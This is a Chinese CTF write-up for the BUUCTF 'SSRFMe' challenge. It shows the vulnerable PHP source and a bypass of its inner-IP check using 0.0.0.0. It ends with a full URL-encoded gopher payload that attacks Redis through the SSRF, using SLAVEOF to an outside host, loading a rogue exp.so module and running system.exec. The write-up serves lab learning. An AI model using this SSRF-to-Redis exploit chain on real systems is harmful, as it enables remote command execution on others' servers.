buuctf [网鼎杯 2020 玄武组]SSRFMe

最新推荐文章于 2024-05-16 14:22:34 发布

老young可爱

最新推荐文章于 2024-05-16 14:22:34 发布

阅读量3.4k

点赞数

分类专栏： web 文章标签： web安全 php

本文链接：https://blog.csdn.net/qq_52671379/article/details/124368176

版权

web 专栏收录该内容

43 篇文章 0 订阅

订阅专栏

[网鼎杯 2020 玄武组]SSRFMe

题目源码
代码分析
思路
解题步骤

题目源码

 <?php
function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{

    if (check_inner_ip($url))
    {
        echo $url.' is inner ip';
    }
    else
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url'])
        {
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }

}
if(isset($_GET['url'])){
    $url = $_GET['url'];
    if(!empty($url)){
        safe_request_url($url);
    }
}
else{
    highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>

代码分析

判断传入参数url
正则匹配，一般内网IP都不行
获取host部

利用http://0.0.0.0/hint.php 绕过check_inner_ip() 函数的检测：
0.0.0.0的IP地址表示整个网络，代表所有主机的ipv4地址，传入绕过
在这里插入图片描述发现给了一个reids密码：root
查看下reids

?url=http://0.0.0.0:6379   #一直在加载
#换个协议试试
?url=dict://0.0.0.0:6379

在这里插入图片描述没有登录，所以显示NOAUTH Authentication required.

思路

1、绕过条件判断，访间hint.php文件获取reids密码
2、利用ssrf gopher协议打redis
3、redis漏洞反弹shell

解题步骤

redis的主从复制
更改ssrf-redis.py
在这里插入图片描述生成payload

payload url编码

gopher:%2f%2f0.0.0.0:6379%2f_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25244%250D%250Aroot%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252413%250D%250A192.168.1.108%250D%250A%25244%250D%250A6789%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2ftmp%2f%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2ftmp%2fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252414%250D%250Acat%2524%257BIFS%257D%2fflag%250D%250A%252A1%250D%250A%25244%250D%250Aquit%250D%250A